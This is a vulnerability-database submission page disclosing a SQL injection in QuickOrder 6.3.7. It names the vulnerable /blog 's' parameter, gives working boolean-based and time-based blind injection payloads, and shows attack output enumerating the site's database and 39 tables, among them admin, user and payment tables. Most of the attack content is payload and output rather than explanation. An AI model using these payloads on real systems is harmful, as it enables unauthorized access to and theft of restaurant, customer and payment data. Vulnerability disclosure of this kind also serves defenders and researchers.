Submit #179282: QuickOrder 6.3.7 - SQL Injectioninfo

TitleQuickOrder 6.3.7 - SQL Injection
Description# Exploit Title: QuickOrder 6.3.7 - SQL Injection # Date: 07/07/2023 # Exploit Author: skalvin aka (CraCkEr) # Vendor: bylancer # Vendor Homepage: https://bylancer.com/ # Software Link: https://quickorder.by-code.com # Version: 6.3.7 # Tested on: Windows 10 Pro # Impact: Database Access Release Notes: SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /blog https://website/blog?s=[SQLI] GET parameter 's' is vulnerable to SQL Injection --- Parameter: s (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: s=1') OR 02445=2445 OR ('04586'='4586 Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (IF - comment) Payload: s=1'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z --- [+] Starting the Attack fetching current database current database: 'quickordercode_**' fetching tables [39 tables] +-------------------------+ | qr_orders | | qr_order_items | | qr_blog_comment | | qr_payments | | qr_menu_variants | | qr_options | | qr_time_zones | | qr_countries | | qr_restaurant | | qr_blog_categories | | qr_logs | | qr_image_menu | | qr_balance | | qr_blog | | qr_menu | | qr_user | | qr_pages | | qr_menu_extras | | qr_taxes | | qr_upgrades | | qr_usergroups | | qr_faq_entries | | qr_transaction | | qr_restaurant_options | | qr_languages | | qr_admins | | qr_allergies | | qr_user_options | | qr_order_item_extras | | qr_subscriptions | | qr_menu_variant_options | | qr_plans | | qr_testimonials | | qr_plan_options | | qr_catagory_main | | qr_currencies | | qr_restaurant_view | | qr_waiter_call | | qr_blog_cat_relation | +-------------------------+ [-] Done
User
 skalvin (UID 49463)
Submission07/07/2023 20:45 (3 years ago)
Moderation07/15/2023 18:28 (8 days later)
StatusAccepted
VulDB entry234236 [Bylancer QuickOrder 6.3.7 GET Parameter /blog s sql injection]
Points17

PreviousOverviewNext

Interested in the pricing of exploits?

See the underground prices here!